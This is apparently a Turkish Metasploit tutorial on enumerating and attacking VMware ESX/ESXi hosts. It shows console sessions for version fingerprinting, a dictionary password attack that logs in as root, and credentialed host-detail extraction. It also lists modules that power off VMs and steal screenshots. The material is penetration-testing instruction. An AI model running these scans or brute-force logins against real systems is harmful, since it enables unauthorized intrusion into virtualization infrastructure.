Metsploit Framework aracında bulunan VMware Auxiliary modülleri ile, yerel ağdaki vmware sistemlerini, vmware kullanıcı ve gruplarını tespit edebilir ve yetkileri hakkında bilgi toplayabilirsiniz. Vmhost ESX/ESXI üzerinde mi çalışıyor, versiyon bilgilerini alabilirsiniz.
VMWare ile ilgili tüm yardımcı araçları bulmak için aşağıdaki arama komutunu kullanabilirsiniz;
msf > search type:auxiliary vmware
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/vmware/poweroff_vm normal VMWare Power Off Virtual Machine
auxiliary/admin/vmware/poweron_vm normal VMWare Power On Virtual Machine
auxiliary/admin/vmware/tag_vm normal VMWare Tag Virtual Machine
auxiliary/admin/vmware/terminate_esx_sessions normal VMWare Terminate ESX Login Sessions
auxiliary/scanner/http/vmware_server_dir_trav normal VMware Server Directory Transversal Vulnerability
auxiliary/scanner/vmware/esx_fingerprint normal VMWare ESX/ESXi Fingerprint Scanner
auxiliary/scanner/vmware/vmauthd_login normal VMWare Authentication Daemon Login Scanner
auxiliary/scanner/vmware/vmauthd_version normal VMWare Authentication Daemon Version Scanner
auxiliary/scanner/vmware/vmware_enum_permissions normal VMWare Enumerate Permissions
auxiliary/scanner/vmware/vmware_enum_sessions normal VMWare Enumerate Active Sessions
auxiliary/scanner/vmware/vmware_enum_users normal VMWare Enumerate User Accounts
auxiliary/scanner/vmware/vmware_enum_vms normal VMWare Enumerate Virtual Machines
auxiliary/scanner/vmware/vmware_host_details normal VMWare Enumerate Host Details
auxiliary/scanner/vmware/vmware_http_login normal VMWare Web Login Scanner
auxiliary/scanner/vmware/vmware_screenshot_stealer normal VMWare Screenshot Stealer
Herhangi bir modül hakkında detaylı bilgiye, info komutu ile ulaşabilirsiniz,
msf > info auxiliary/scanner/vmware/esx_fingerprint
Name: VMWare ESX/ESXi Fingerprint Scanner
Module: auxiliary/scanner/vmware/esx_fingerprint
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
TheLightCosine <thelightcosine@metasploit.com>
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 443 yes The target port
THREADS 1 yes The number of concurrent threads
URI /sdk no The uri path to test against
VHOST no HTTP server virtual host
Description:
This module accesses the web API interfaces for VMware ESX/ESXi
servers and attempts to identify version information for that
server.
Uygulamalar,
Networkde bulunan vmware sistemleri ve versiyonlarını tespit etmek (esx_fingerprint)
msf > use auxiliary/scanner/vmware/esx_fingerprint
msf auxiliary(esx_fingerprint) > show optionsModule options (auxiliary/scanner/vmware/esx_fingerprint):
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 443 yes The target port
THREADS 1 yes The number of concurrent threads
URI /sdk no The uri path to test against
VHOST no HTTP server virtual hostmsf auxiliary(esx_fingerprint) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(esx_fingerprint) > run[+] Identified VMware ESXi 4.1.0 build-260247
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Not: RHOSTS değeri; ip adresi (1.1.1.1), subnet (1.1.1.0/8) veya dosyadan okunacak şekilde (file:/tmp/ip.lst) set edilebilir.
Sanallaştırmanın VMware ESXi 4.1.0 versiyona sahip olduğu tespit edildi.
VMWare Authentication Daemon Version Scanner (vmauthd_version)
Bu modül, TCP 902 portundan bağlantı kurarak hedefin kimlik doğrulama servisi hakkında bilgi verir.
msf > use auxiliary/scanner/vmware/vmauthd_version
msf auxiliary(vmauthd_version) > infoName: VMWare Authentication Daemon Version Scanner
Module: auxiliary/scanner/vmware/vmauthd_version
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: NormalProvided by:
TheLightCosine <thelightcosine@metasploit.com>
hdm <hdm@metasploit.com>Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 902 yes The target port
THREADS 1 yes The number of concurrent threadsDescription:
This module will identify information about a host through the
vmauthd service.msf auxiliary(vmauthd_version) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmauthd_version) > run[*] 1.1.1.1:902 Switching to SSL connection…
[*] 1.1.1.1:902 Banner: 220 VMware Authentication Daemon Version 1.10: SSL Required, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , VMXARGS supported Certificate:/C=US/ST=California/L=Palo Alto/O=VMware, Inc/OU=VMware ESX Server Default Certificate/emailAddress=ssl-certificates@vmware.com/CN=localhost.localdomain/unstructuredName=1295122519,564d7761726520496e632e
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
VMWare Web Login Taraması (vmware_http_login)
Bu modül vmware kimlik doğrulama servisine parola denemesi gerçekleştirir, bu işlem için bir sözlük dosyası kullanabilirsiniz.
msf > use auxiliary/scanner/vmware/vmware_http_login
msf auxiliary(vmware_http_login) > set PASS_FILE /root/pass.lst
PASS_FILE => /root/pass.lst
msf auxiliary(vmware_http_login) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmware_http_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(vmware_http_login) > run[+] 1.1.1.1:443 – Identified VMware ESXi 4.1.0 build-260247
[-] 1.1.1.1:443 – Login Failure (root:)
[-] 1.1.1.1:443 – Login Failure (root:root)
[-] 1.1.1.1:443 – Login Failure (root:admin)
[-] 1.1.1.1:443 – Login Failure (root:password)
[-] 1.1.1.1:443 – Login Failure (root:123456)
[-] 1.1.1.1:443 – Login Failure (root:P@ssw0rd)
[+] 1.1.1.1:443 – Successful Login! (root:BenimGizliParolam)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
VMWare Host Hakkında Detaylı Bilgi Alma (vmware_host_details)
Bağlantı bilgileri elde ettikden sonra, VMWare sisteminden bu yardımcı araç ile detaylı bilgi alınabilir.
msf > use auxiliary/scanner/vmware/vmware_host_details
msf auxiliary(vmware_host_details) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmware_host_details) > set PASSWORD BenimGizliParolam
PASSWORD => BenimGizliParolam
msf auxiliary(vmware_host_details) > set HW_DETAILS true
HW_DETAILS => true
msf auxiliary(vmware_host_details) > run[+] VMWare Host at 1.1.1.1 details
—————————–
—
– ha-host:
hardware:
vendor: System manufacturer
model: System Product Name
uuid: 8065001e-8c00-00df-2315-bcaec504ad78
otherIdentifyingInfo:
identifierValue: ! ‘ Asset-1234567890’
identifierType:
label: AssetTag
summary: AssetTag
key: AssetTag
memorySize: ‘16909213696’
cpuModel: AMD Phenom(tm) II X4 965 Processor
cpuMhz: ‘3411’
numCpuPkgs: ‘1’
numCpuCores: ‘4’
numCpuThreads: ‘4’
numNics: ‘1’
numHBAs: ‘8’
runtime:
connectionState: connected
powerState: poweredOn
inMaintenanceMode: ‘false’
bootTime: ‘2012-01-30T17:08:58.847297Z’
config:
name: localhost.
port: ‘902’
product:
Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr